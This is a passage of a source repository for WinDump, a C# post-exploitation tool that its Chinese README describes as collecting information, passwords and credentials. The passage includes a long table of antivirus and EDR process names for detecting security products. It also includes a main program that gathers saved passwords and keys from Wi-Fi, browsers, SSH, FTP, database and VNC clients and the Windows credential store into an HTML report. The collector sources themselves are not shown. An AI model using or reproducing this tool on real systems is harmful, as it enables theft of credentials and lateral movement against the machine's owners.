"TotalDefense"}, 310 | {"SWatcherSrv.exe", "TotalDefense"}, 311 | {"Prd.ManagementConsole.exe", "TotalDefense"}, 312 | {"TrapmineEnterpriseService.exe", "Trapmine"}, 313 | {"TrapmineEnterpriseConfig.exe", "Trapmine"}, 314 | {"TrapmineDeployer.exe", "Trapmine"}, 315 | {"TrapmineUpgradeService.exe", "Trapmine"}, 316 | {"TMBMSRV.exe", "TrendMicro"}, 317 | {"ntrtscan.exe", "TrendMicro"}, 318 | {"Pop3Trap.exe", "TrendMicro"}, 319 | {"WebTrap.exe", "TrendMicro"}, 320 | {"PccNTMon.exe", "亚信安全防毒墙网络版 or TrendMicro"}, 321 | {"SBAMSvc.exe", "VIPRE"}, 322 | {"VipreEdgeProtection.exe", "VIPRE"}, 323 | {"SBAMTray.exe", "VIPRE"}, 324 | {"vrmonnt.exe", "ViRobot"}, 325 | {"vrmonsvc.exe", "ViRobot"}, 326 | {"Vrproxyd.exe", "ViRobot"}, 327 | {"npwebroot.exe", "Webroot"}, 328 | {"WRSA.exe", "Webroot"}, 329 | {"spysweeperui.exe", "Webroot"}, 330 | {"Yandex.exe", "Yandex"}, 331 | {"YandexDisk.exe", "Yandex"}, 332 | {"yandesk.exe", "Yandex"}, 333 | {"zillya.exe", "Zillya"}, 334 | {"ZAVAux.exe", "Zillya"}, 335 | {"ZAVCore.exe", "Zillya"}, 336 | {"vsmon.exe", "ZoneAlarm"}, 337 | {"zapro.exe", "ZoneAlarm"}, 338 | {"zonealarm.exe", "ZoneAlarm"}, 339 | {"ZPSTray.exe", "Zoner"}, 340 | {"dasc.exe", "eGambit"}, 341 | {"memscan64.exe", "eGambit"}, 342 | {"dastray.exe", "eGambit"}, 343 | {"consctl.exe", "eScan"}, 344 | {"mwaser.exe", "eScan"}, 345 | {"avpmapp.exe", "eScan"}, 346 | {"AAWTray.exe", "Lavasoft"}, 347 | {"LavasoftTcpService.exe", "Lavasoft"}, 348 | {"AdAwareTray.exe", "Lavasoft"}, 349 | {"WebCompanion.exe", "Lavasoft"}, 350 | {"WebCompanionInstaller.exe", "Lavasoft"}, 351 | {"adawarebp.exe", "Lavasoft"}, 352 | {"ad-watch.exe", "Lavasoft"}, 353 | {"cleaner8.exe", "The Cleaner"}, 354 | {"vba32lder.exe", "VBA32"}, 355 | {"MongoosaGUI.exe", "Mongoosa"}, 356 | {"mongoose.exe", "Mongoosa"}, 357 | {"CorantiControlCenter32.exe", "Coranti2012"}, 358 | {"UnThreat.exe", "UnThreat"}, 359 | {"utsvc.exe", "UnThreat"}, 360 | {"CKSoftShiedAntivirus4.exe", "Shield Antivirus"}, 361 | {"shieldtray.exe", 
"Shield Antivirus"}, 362 | {"AVWatchService.exe", "VIRUSfighter"}, 363 | {"vfproTray.exe", "VIRUSfighter"}, 364 | {"iptray.exe", "Immunet"}, 365 | {"PSafeSysTray.exe", "PSafe"}, 366 | {"PSafeCategoryFinder.exe", "PSafe"}, 367 | {"psafesvc.exe", "PSafe"}, 368 | {"nspupsvc.exe", "nProtect"}, 369 | {"Npkcmsvc.exe", "nProtect"}, 370 | {"npnj5Agent.exe", "nProtect"}, 371 | {"SpywareTerminatorShield.exe", "Spyware Terminator"}, 372 | {"SpywareTerminator.exe", "Spyware Terminator"}, 373 | {"ccSvcHst.exe", "Norton(赛门铁克)"}, 374 | {"rtvscan.exe", "Norton(赛门铁克)"}, 375 | {"ccapp.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 376 | {"NPFMntor.exe", "Norton(赛门铁克)"}, 377 | {"ccRegVfy.exe", "Norton(赛门铁克)"}, 378 | {"vptray.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 379 | {"iamapp.exe", "Norton(赛门铁克)"}, 380 | {"nav.exe", "Norton(赛门铁克)"}, 381 | {"navapw32.exe", "Norton(赛门铁克)"}, 382 | {"navapsvc.exe", "Norton(赛门铁克)"}, 383 | {"nisum.exe", "Norton(赛门铁克)"}, 384 | {"nmain.exe", "Norton(赛门铁克)"}, 385 | {"nprotect.exe", "Norton(赛门铁克)"}, 386 | {"smcGui.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 387 | {"ns.exe", "Norton(赛门铁克)"}, 388 | {"nortonsecurity.exe", "Norton(赛门铁克)"}, 389 | {"afwServ.exe", "Norton V25(Avast)"}, 390 | {"aswEngSrv.exe", "Norton V25(Avast)"}, 391 | {"aswidsagent.exe", "Norton V25(Avast)"}, 392 | {"AvDump.exe", "Norton V25(Avast)"}, 393 | {"nllToolsSvc.exe", "Norton V25(Avast)"}, 394 | {"NortonSvc.exe", "Norton V25(Avast)"}, 395 | {"wsc_proxy.exe", "Norton V25(Avast)"}, 396 | {"ccSetMgr.exe", "Symantec(赛门铁克)"}, 397 | {"ccpxysvc.exe", "Symantec(赛门铁克)"}, 398 | {"cfgwiz.exe", "Symantec(赛门铁克)"}, 399 | {"smc.exe", "Symantec(赛门铁克)"}, 400 | {"symproxysvc.exe", "Symantec(赛门铁克)"}, 401 | {"vpc32.exe", "Symantec(赛门铁克)"}, 402 | {"lsetup.exe", "Symantec(赛门铁克)"}, 403 | {"luall.exe", "Symantec(赛门铁克)"}, 404 | {"lucomserver.exe", "Symantec(赛门铁克)"}, 405 | {"sbserv.exe", "Symantec(赛门铁克)"}, 406 | {"ccEvtMgr.exe", "Symantec(赛门铁克)"}, 407 | {"snac.exe", "Symantec(赛门铁克)"}, 408 | {"SymCorpUI.exe", 
"Symantec(赛门铁克)"}, 409 | {"sepWscSvc64.exe", "Symantec(赛门铁克)"}, 410 | {"knsdtray.exe", "可牛杀毒"}, 411 | {"Miner.exe", "流量矿石"}, 412 | {"safedog.exe", "SafeDog(安全狗)"}, 413 | {"SafeDogGuardCenter.exe", "SafeDog(安全狗)"}, 414 | {"SafeDogSiteIIS.exe", "SafeDog(安全狗)"}, 415 | {"SafeDogTray.exe", "SafeDog(安全狗)"}, 416 | {"SafeDogServerUI.exe", "SafeDog(安全狗)"}, 417 | {"SafeDogSiteApache.exe", "SafeDog(安全狗)"}, 418 | {"CloudHelper.exe", "SafeDog(安全狗)"}, 419 | {"SafeDogUpdateCenter.exe", "SafeDog(安全狗)"}, 420 | {"parmor.exe", "木马克星"}, 421 | {"Iparmor.exe", "木马克星"}, 422 | {"beikesan.exe", "贝壳云安全"}, 423 | {"TrojanHunter.exe", "木马猎手"}, 424 | {"GG.exe", "巨盾网游安全盾"}, 425 | {"adam.exe", "绿鹰安全精灵"}, 426 | {"AST.exe", "超级巡警"}, 427 | {"ananwidget.exe", "墨者安全专家"}, 428 | {"FYFireWall.exe", "风云防火墙"}, 429 | {"MPMon.exe", "微点主动防御"}, 430 | {"pfw.exe", "天网防火墙"}, 431 | {"D_Safe_Manage.exe", "D 盾"}, 432 | {"d_manage.exe", "D 盾"}, 433 | {"yunsuo_agent_service.exe", "云锁"}, 434 | {"yunsuo_agent_daemon.exe", "云锁"}, 435 | {"HwsPanel.exe", "护卫神"}, 436 | {"hws_ui.exe", "护卫神"}, 437 | {"hws.exe", "护卫神"}, 438 | {"hwsd.exe", "护卫神"}, 439 | {"HwsHostPanel.exe", "护卫神"}, 440 | {"HwsHostMaster.exe", "护卫神"}, 441 | {"hipstray.exe", "火绒安全"}, 442 | {"wsctrl.exe", "火绒安全"}, 443 | {"usysdiag.exe", "火绒安全"}, 444 | {"HipsDaemon.exe", "火绒安全"}, 445 | {"HipsLog.exe", "火绒安全"}, 446 | {"HipsMain.exe", "火绒安全"}, 447 | {"wsctrlsvc.exe", "火绒安全"}, 448 | {"WEBSCANX.exe", "网络病毒克星"}, 449 | {"SPHINX.exe", "SPHINX防火墙"}, 450 | {"TQClient.exe", "奇安信天擎"}, 451 | {"TQTray.exe", "奇安信天擎"}, 452 | {"QaxEngManager.exe", "奇安信天擎"}, 453 | {"TQDefender.exe", "奇安信天擎"}, 454 | {"avwin.exe", "H+BEDV Datentechnik GmbH"}, 455 | {"avwupsrv.exe", "H+BEDV Datentechnik GmbH"}, 456 | {"blackd.exe", "IBM ISS Proventia"}, 457 | {"rapapp.exe", "IBM ISS Proventia"}, 458 | {"eeyeevnt.exe", "eEye Digital Security"}, 459 | {"blink.exe", "eEye Digital Security"}, 460 | {"cv.exe", "TamoSoft"}, 461 | {"ent.exe", "TamoSoft"}, 462 | {"persfw.exe", "Kerio Personal Firewall"}, 463 
| {"wrctrl.exe", "Kerio Personal Firewall"}, 464 | {"Trjscan.exe", "Simplysup"}, 465 | {"PCTAV.exe", "PC Tools AntiVirus"}, 466 | {"pctsGui.exe", "PC Tools AntiVirus"}, 467 | {"vbcmserv.exe", "VirusBuster Professional"}, 468 | {"ClamTray.exe", "ClamWin"}, 469 | {"clamscan.exe", "ClamWin"}, 470 | {"kxetray.exe", "金山毒霸 or 安天智甲"}, 471 | {"kscan.exe", "金山毒霸 or 安天智甲"}, 472 | {"AMediumManager.exe", "安天智甲"}, 473 | {"kismain.exe", "安天智甲"}, 474 | {"CMCNECore.exe", "CMC Endpoint Security"}, 475 | {"cmcepagent.exe", "CMC Endpoint Security"}, 476 | {"cmccore.exe", "CMC Endpoint Security"}, 477 | {"CMCLog.exe", "CMC Endpoint Security"}, 478 | {"CMCFMon.exe", "CMC Endpoint Security"}, 479 | {"kxescore.exe", "金山毒霸"}, 480 | {"kupdata.exe", "金山毒霸"}, 481 | {"kwsprotect64.exe", "金山毒霸"}, 482 | {"kislive.exe", "金山毒霸"}, 483 | {"knewvip.exe", "金山毒霸"}, 484 | {"kxecenter.exe", "金山毒霸"}, 485 | {"kxemain.exe", "金山毒霸"}, 486 | {"KWatch.exe", "金山毒霸"}, 487 | {"KSafeSvc.exe", "金山毒霸"}, 488 | {"KSafeTray.exe", "金山毒霸"}, 489 | {"outpost.exe", "Agnitum outpost (Outpost Firewall)"}, 490 | {"acs.exe", "Agnitum outpost (Outpost Firewall)"}, 491 | {"CynetLauncher.exe", "Cynet"}, 492 | {"CynetDS.exe", "Cynet"}, 493 | {"CynetEPS.exe", "Cynet"}, 494 | {"CynetMS.exe", "Cynet"}, 495 | {"CynetAR.exe", "Cynet"}, 496 | {"CynetGW.exe", "Cynet"}, 497 | {"CynetSD64.exe", "Cynet"}, 498 | {"winlogbeat.exe", "Elastic"}, 499 | {"KSWebShield.exe", "金山网盾"}, 500 | {"kpfwtray.exe", "金山网镖"}, 501 | {"1433.exe", "在扫1433"}, 502 | {"DUB.exe", "在爆破"}, 503 | {"ServUDaemon.exe", "发现S-U"}, 504 | {"baiduSafeTray.exe", "百度卫士"}, 505 | {"avkwctl9.exe", "G Data文件系统实时监控"}, 506 | {"AVKWCTL.exe", "G Data文件系统实时监控"}, 507 | {"SAVMAIN.exe", "Sophos Anti-Virus"}, 508 | {"safeboxTray.exe", "360保险箱"}, 509 | {"Notifier.exe", "亚信安全服务器深度安全防护系统"}, 510 | {"AliYunDun.exe", "阿里云盾"}, 511 | {"AliYunDunUpdate.exe", "阿里云盾"}, 512 | {"aliyun_assist_service.exe", "阿里云盾"}, 513 | {"BaradAgent.exe", "腾讯云安全"}, 514 | {"sgagent.exe", "腾讯云安全"}, 515 | {"YDService.exe", 
"腾讯云安全"}, 516 | {"YDLive.exe", "腾讯云安全"}, 517 | {"YDEdr.exe", "腾讯云安全"}, 518 | {"360WebSafe.exe", "360主机卫士Web"}, 519 | {"QHSrv.exe", "360主机卫士Web"}, 520 | {"QHWebshellGuard.exe", "360主机卫士Web"}, 521 | {"gov_defence_service.exe", "网防G01"}, 522 | {"gov_defence_daemon.exe", "网防G01"}, 523 | {"PC.exe", "云锁客户端"}, 524 | {"SNDSrvc.exe", "Symantec Shared诺顿邮件防火墙软件"}, 525 | {"USBKiller.exe", "U盘杀毒专家"}, 526 | {"360EntClient.exe", "天擎EDRAgent"}, 527 | {"360EntMisc.exe", "360(奇安信)天擎"}, 528 | {"alisecguard.exe", "阿里云-云盾"}, 529 | {"ALsvc.exe", "Sophos AutoUpdate Service"}, 530 | {"CmsGoAgent.windows-amd64.", "阿里云监控"}, 531 | {"edr_agent.exe", "深信服EDRAgent"}, 532 | {"edr_monitor.exe", "深信服EDRAgent"}, 533 | {"edr_sec_plan.exe", "深信服EDRAgent"}, 534 | {"rm_service.exe", "戎码翼龙 NG-EDR"}, 535 | {"rm_live.exe", "戎码翼龙 NG-EDR"}, 536 | {"rm_tray.exe", "戎码翼龙 NG-EDR"}, 537 | {"rm_hips.exe", "戎码翼龙 NG-EDR"}, 538 | {"ESAV.exe", "启明星辰天珣EDRAgent"}, 539 | {"ESCCControl.exe", "启明星辰天珣EDRAgent"}, 540 | {"ESCC.exe", "启明星辰天珣EDRAgent"}, 541 | {"ESCCIndex.exe", "启明星辰天珣EDRAgent"}, 542 | {"gse_win_agent.exe", "蓝鲸Agent"}, 543 | {"gse_win_daemon.exe", "蓝鲸Agent"}, 544 | {"LAVService.exe", "联想电脑管家"}, 545 | {"McsAgent.exe", "Sophos MCS Agent"}, 546 | {"McsClient.exe", "Sophos MCS Client"}, 547 | {"QHSafeMain.exe", "360TotalSecurity(360国际版)"}, 548 | {"QHSafeTray.exe", "360TotalSecurity(360国际版)"}, 549 | {"QHWatchdog.exe", "360TotalSecurity(360国际版)"}, 550 | {"sdcservice.exe", "Sophos Device Control Service"}, 551 | {"SEDService.exe", "Sophos Endpoint Defense Service"}, 552 | {"smartscreen.exe", "Windows Defender SmartScreen"}, 553 | {"SophosCleanM64.exe", "Sophos Clean Service"}, 554 | {"SophosFIMService.exe", "Sophos FIM"}, 555 | {"SSPService.exe", "Sophos System Protection Service"}, 556 | {"swc_service.exe", "Sophos Web Control Service"}, 557 | {"TitanAgent.exe", "天眼云镜"}, 558 | {"TitanMonitor.exe", "天眼云镜"}, 559 | {"TopsecMain.exe", "天融信终端防御"}, 560 | {"TopsecTray.exe", "天融信终端防御"}, 561 | {"wdswfsafe.exe", "360杀毒-网盾"}, 
562 | {"WiseVector.exe", "智量安全"}, 563 | {"WiseVectorSvc.exe", "智量安全"}, 564 | {"QAXEntClient.exe", "天擎"}, 565 | {"QAXTray.exe", "天擎"}, 566 | {"AgentService.exe", "安恒主机卫士"}, 567 | {"ProtectMain.exe", "安恒主机卫士"}, 568 | {"Deep Security Manager.exe", "亚信DS服务端"}, 569 | {"dsa.exe", "亚信DS客户端"}, 570 | {"UniAccessAgent.exe", "亚信DS客户端"}, 571 | {"dsvp.exe", "亚信DS客户端"}, 572 | {"zabbix_agentd", "zabbix agen端"}, 573 | {"AliHips", "阿里系监控"}, 574 | {"AliNet", "阿里系监控"}, 575 | {"AliDetect", "阿里系监控"}, 576 | {"AliScriptEngine", "阿里系监控"}, 577 | {"secu-tcs-agent", "腾讯系监控"}, 578 | {"SentinelServiceHost.exe", "SentinelOne(哨兵一号)"}, 579 | {"SentinelStaticEngine.exe", "SentinelOne(哨兵一号)"}, 580 | {"SentinelStaticEngineScanner.exe", "SentinelOne(哨兵一号)"}, 581 | {"SentinelMemoryScanner.exe", "SentinelOne(哨兵一号)"}, 582 | {"SentinelAgent.exe", "SentinelOne(哨兵一号)"}, 583 | {"SentinelAgentWorker.exe", "SentinelOne(哨兵一号)"}, 584 | {"SentinelUI.exe", "SentinelOne(哨兵一号)"}, 585 | {"tbAgent.exe", "OneSec(微步)"}, 586 | {"tbAgentSrv.exe", "OneSec(微步)"}, 587 | {"tbGuard.exe", "OneSec(微步)"}, 588 | {"PccNT.exe", "亚信安全防毒墙网络版"}, 589 | {"PccNTUpd.exe", "亚信安全防毒墙网络版"}, 590 | {"venVtapServer.exe", "Illumio ZTS"}, 591 | {"venPlatformHandler.exe", "Illumio ZTS"}, 592 | {"venAgentMonitor.exe", "Illumio ZTS"}, 593 | {"venAgentMgr.exe", "Illumio ZTS"}, 594 | {"NuboshEndpoint.exe", "奇安信统一服务器安全"}, 595 | {"IMF.exe", "IObit Malware Fighter"}, 596 | {"IMFCore.exe", "IObit Malware Fighter"}, 597 | {"IMFsrv.exe", "IObit Malware Fighter"}, 598 | {"IMFSrvWsc.exe", "IObit Malware Fighter"}, 599 | }; 600 | } 601 | } 602 | -------------------------------------------------------------------------------- /Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.IO; 5 | using System.IO.Compression; 6 | using System.Net; 7 | using System.Text; 8 | 9 | namespace WinDump 10 | { 11 | internal class Program 12 | { 13 
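/// <summary>
/// Process entry point: runs <see cref="DoMain"/> and, if anything escapes it,
/// records the exception text before exiting with a non-zero code.
/// </summary>
/// <param name="args">Command-line arguments; not read by this method.</param>
static void Main(string[] args)
{
    try
    {
        DoMain();
    }
    catch (Exception ex)
    {
        // Host artefact on failure: "error.log" in the executable's base directory,
        // holding the full exception text (type, message, stack trace).
        File.WriteAllText(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "error.log"), ex.ToString());
        Environment.Exit(1);
    }
}

/// <summary>
/// Runs every collector, substitutes the results into the embedded HTML template
/// and writes the finished report, gzip-compressed, next to the executable.
/// </summary>
/// <remarks>
/// Host artefacts for triage: the report is written to
/// <c>&lt;base directory&gt;\&lt;title&gt;.html.gz</c>, where title is
/// <c>Interface.GetIP() + "_" + Environment.MachineName</c>, or the literal
/// "windump" when that lookup throws. The project README states that several
/// of the "Cred" collectors return passwords and keys; nothing in this method
/// encrypts the report, it is only gzip-compressed.
/// </remarks>
static void DoMain()
{
    var title = "windump";
    DataTable navicatkey = null;
    DataTable navicat = null;
    try
    {
        // Both statements share one try block: if GetIP() throws, the Navicat
        // call is skipped as well and both tables stay null.
        title = Interface.GetIP() + "_" + Environment.MachineName;
        navicat = Navicat.GetNavicat(out navicatkey);
    }
    catch { }

    // Template placeholder -> HTML fragment. Both sides are strings, as required
    // by StringBuilder.Replace(string, string) below.
    // NOTE(review): entries wrapped in Utils.TryToHTML presumably swallow collector
    // errors (Utils is not visible here — confirm). Files.Hosts/IIS/Powershell,
    // DBeaver.GetDBeaver and Utils.ToHTML are called directly, so an exception
    // from any of them propagates to Main's catch and no report is written.
    Dictionary<string, string> values = new Dictionary<string, string>
    {
        {"{title}", title},
        // Network
        {"{interface}", Utils.TryToHTML(Interface.GetInterface)},
        {"{route}", Utils.TryToHTML(Routing.GetRoute)},
        {"{tcp}", Utils.TryToHTML(Netstat.GetTCP)},
        {"{udp}", Utils.TryToHTML(Netstat.GetUDP)},
        {"{dns}", Utils.TryToHTML(DNSCache.GetDNSCache)},
        {"{wifi}", Utils.TryToHTML(WIFI.GetWIFI)},

        // User
        {"{user}", Utils.TryToHTML(User.GetUser)},
        {"{quser}", Utils.TryToHTML(QUser.GetQUser)},

        // Process
        {"{process}", Utils.TryToHTML(Process.GetProcess)},
        {"{service}", Utils.TryToHTML(Process.GetService)},
        {"{av}", Utils.TryToHTML(Process.GetAV)},

        // Files
        {"{hosts}", Files.Hosts()},
        {"{iis}", Files.IIS()},
        {"{powershell}", Files.Powershell()},

        // Directories
        {"{programs}", Utils.TryToHTML(Directories.Programs)},
        {"{recent}", Utils.TryToHTML(Directories.Recent)},
        {"{explorer}", Utils.TryToHTML(Directories.ExplorerHistory)},
        {"{desktop}", Utils.TryToHTML(Directories.Desktop)},
        {"{documents}", Utils.TryToHTML(Directories.Documents)},
        {"{ssh}", Utils.TryToHTML(Directories.SSH)},

        // Cred
        {"{rdp}", Utils.TryToHTML(RDP.GetRDP)},
        {"{putty}", Utils.TryToHTML(Putty.GetPutty)},
        {"{filezilla}", Utils.TryToHTML(FileZilla.GetFileZilla)},
        {"{xmanager_session}", Utils.TryToHTML(XManager.GetSession)},
        {"{xmanager_key}", Utils.TryToHTML(XManager.GetUserKey)},
        {"{winscp}", Utils.TryToHTML(WinSCP.GetWinSCP)},
        {"{finalshell}", Utils.TryToHTML(FinalShell.GetFinalShell)},
        {"{finalshellkey}", Utils.TryToHTML(FinalShell.GetFinalShellKey)},
        {"{securecrt}", Utils.TryToHTML(SecureCRT.GetSecureCRT)},
        {"{navicat}", Utils.ToHTML(navicat)},
        {"{navicatkey}", Utils.ToHTML(navicatkey)},
        {"{dbeaver}", DBeaver.GetDBeaver()},
        {"{browser}", Utils.TryToHTML(BrowserChromiumBased.GetChromiumBased)},
        {"{credential}", Utils.TryToHTML(Credential.GetCred)},
        {"{openvpn}", Utils.TryToHTML(OpenVPN.GetOpenVPN)},
        {"{tightvnc}", Utils.TryToHTML(TightVNC.GetTightVNC)},
        {"{ultravnc}", Utils.TryToHTML(UltraVNC.GetUltraVNC)},

        // System
        {"{systeminfo}", Utils.TryToHTML(SystemInfo.GetInfo)},
        {"{drive}", Utils.TryToHTML(SystemInfo.GetDrive)},
        {"{product}", Utils.TryToHTML(SystemInfo.GetInstalledApp)},
    };

    // Inflate the gzip-compressed HTML template embedded as Resource.index.
    var output = new MemoryStream();
    using (var ms = new MemoryStream(Resource.index))
    using (var gz = new GZipStream(ms, CompressionMode.Decompress))
    {
        byte[] buffer = new byte[4096];
        int bytesRead;
        while ((bytesRead = gz.Read(buffer, 0, buffer.Length)) > 0)
        {
            output.Write(buffer, 0, bytesRead);
        }
    }

    // Plain textual substitution of every placeholder in the template.
    var sb = new StringBuilder(Encoding.UTF8.GetString(output.ToArray()));
    foreach (KeyValuePair<string, string> item in values)
    {
        sb.Replace(item.Key, item.Value);
    }

    // FileMode.Create overwrites an earlier report with the same title.
    var data = Encoding.UTF8.GetBytes(sb.ToString());
    var filename = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, title + ".html.gz");
    using (var fs = new FileStream(filename, FileMode.Create, FileAccess.Write, FileShare.None))
    using (var gz = new GZipStream(fs, CompressionMode.Compress))
    {
        gz.Write(data, 0, data.Length);
    }
    Environment.Exit(0);

}


} // end class Program
} // end namespace WinDump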
-------------------------------------------------------------------------------- /Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("WinDump")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("WinDump")] 13 | [assembly: AssemblyCopyright("Copyright © 2025")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("4dc5651b-ac64-449b-bc58-620086193035")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | [assembly: AssemblyVersion("1.0.0.0")] 33 | [assembly: AssemblyFileVersion("1.0.0.0")] 34 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WinDump 2 | 3 | 后渗透信息/密码/凭证收集工具 4 | 5 | 相对于其他工具主要有以下特点 6 | 7 | 1. 报告使用html更直观 8 | 2. 增加ssh的key相关的获取 9 | 3. 不使用危险的操作 10 | 1. 不使用额外命令 11 | 2. 不使用远程注入/读写内存 12 | 4. 
使用.Net Framework v2.0兼容更多系统 13 | 14 | ## 收集列表 15 | 16 | | **名称** | **描述** | **备注** | **等价命令** | 17 | |---------------------|-----------------------------|----------------------------|--------------------------------------| 18 | | Interface | 网卡信息 | | ipconfig | 19 | | Route | 路由信息 | | route print | 20 | | TCP | tcp连接信息 | | netstat -ano -p tcp | 21 | | UDP | udp连接信息 | | netstat -ano -p udp | 22 | | DNSCache | dns缓存 | win8/server2012以上支持 | ipconfig /displaydns | 23 | | WIFI | wifi信息 | 包含密码 | netsh wlan export profile key=clear | 24 | | User | 用户列表 | | | 25 | | LoggedUser | 已登录用户 | | quser | 26 | | Process | 进程信息 | | tasklist | 27 | | Service | 服务信息 | | sc queryex type= service state= all | 28 | | AV | 杀软 | | | 29 | | Start Menu Programs | 开始菜单目录 | | | 30 | | Recent Files | 最近文件目录 | | | 31 | | Explorer History | 文件管理器历史 | 包含Win+R历史、文件管理器中输入历史 | | 32 | | Desktop | 桌面目录 | | | 33 | | Documents | 文档目录 | | | 34 | | SSH | ~\.ssh目录 | 包含config文件中指向的IdentityFile | | 35 | | Hosts File | hosts文件 | | | 36 | | IIS Configuration | IIS配置文件 | | | 37 | | RDP | RDP连接历史 | 不包含密码 | | 38 | | Putty | Putty连接历史 | 不包含密码 | | 39 | | FileZilla | FileZilla站点和快速连接 | 包含密码和key | | 40 | | Xmanager | XShell/XFTP/XStart/Xmanager | 包含密码和key | | 41 | | WinSCP | WinSCP站点 | 包含密码和key | | 42 | | FinalShell | FinalShell | 包含密码和key | | 43 | | SecureCRT | SecureCRT | 包含密码和key | | 44 | | Navicat | Navicat | 包含密码和ssh隧道的密码和key | | 45 | | DBeaver | DBeaver | 包含密码和ssh隧道的密码 | | 46 | | Browser | 基于chrome的浏览器 | 只包含密码,不支持v20 | | 47 | | Windows Credential | windows凭据 | 包含RDP/OpenVPN等的密码 | | 48 | | OpenVPN | OpenVPN的连接配置文件 | 包含ovpn文件 | | 49 | | TightVNC | TightVNC服务端密码 | | | 50 | | UltraVNC | UltraVNC服务端密码 | | | 51 | | System Information | 系统版本/内存/代理/补丁等 | | | 52 | | Drive | 驱动器 | | | 53 | | Product | 安装软件 | | | 54 | 55 | ## 截图 56 | 57 | ![windump](./windump.png) 58 | 59 | ## 相关链接 60 | 61 | 重度参考了以下项目 62 | 63 | * 64 | * 65 | * --------------------------------------------------------------------------------
/Resource.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // 此代码由工具生成。 4 | // 运行时版本:4.0.30319.42000 5 | // 6 | // 对此文件的更改可能会导致不正确的行为,并且如果 7 | // 重新生成代码,这些更改将会丢失。 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace WinDump { 12 | using System; 13 | 14 | 15 | /// 16 | /// 一个强类型的资源类,用于查找本地化的字符串等。 17 | /// 18 | // 此类是由 StronglyTypedResourceBuilder 19 | // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。 20 | // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen 21 | // (以 /str 作为命令选项),或重新生成 VS 项目。 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resource { 26 | 27 | private static global::System.Resources.ResourceManager resourceMan; 28 | 29 | private static global::System.Globalization.CultureInfo resourceCulture; 30 | 31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 32 | internal Resource() { 33 | } 34 | 35 | /// 36 | /// 返回此类使用的缓存的 ResourceManager 实例。 37 | /// 38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 39 | internal static global::System.Resources.ResourceManager ResourceManager { 40 | get { 41 | if (object.ReferenceEquals(resourceMan, null)) { 42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("WinDump.Resource", typeof(Resource).Assembly); 43 | resourceMan = temp; 44 | } 45 | return resourceMan; 46 | } 47 | } 48 | 49 | /// 50 | /// 重写当前线程的 CurrentUICulture 属性,对 51 | /// 使用此强类型资源类的所有资源查找执行重写。 52 | /// 53 | 
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 54 | internal static global::System.Globalization.CultureInfo Culture { 55 | get { 56 | return resourceCulture; 57 | } 58 | set { 59 | resourceCulture = value; 60 | } 61 | } 62 | 63 | /// 64 | /// 查找 System.Byte[] 类型的本地化资源。 65 | /// 66 | internal static byte[] index { 67 | get { 68 | object obj = ResourceManager.GetObject("index", resourceCulture); 69 | return ((byte[])(obj)); 70 | } 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /Resource.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 122 | Resources\index.html.gz;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 123 | 124 | -------------------------------------------------------------------------------- /Resources/index.html.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howmp/WinDump/756ef446c38719c1071b84dffe42125925a7b7ca/Resources/index.html.gz -------------------------------------------------------------------------------- /SystemInfo.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using 
